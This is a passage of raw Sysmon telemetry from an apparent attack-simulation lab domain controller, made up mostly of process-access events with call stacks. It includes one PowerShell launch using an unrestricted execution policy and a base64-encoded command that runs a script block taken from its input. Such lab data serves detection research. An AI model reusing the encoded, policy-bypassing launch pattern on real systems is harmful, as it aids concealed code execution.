dll+51791 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3F-5FA1-0503-000000008701}4068C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7C3E-5FA1-0403-000000008701}50124960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3F-5FA1-0503-000000008701}4068C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81ceff2b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81190db5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81190a86|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81c420eb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+8115161c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+811afaeb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81193150|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81193150|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81192fe1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81184f66|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81191499|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+8119108c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81190db5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81190a86|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81c420eb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+811778e7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+81176eb7 154100x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.131{D28789B6-7C3F-5FA1-0503-000000008701}4068C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.107{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.107{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.107{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.060{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.060{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.013{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2or4tcbp.tpe.ps12020-11-03 15:50:23.013 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.997{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7C40-5FA1-1103-000000008701}34363044C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 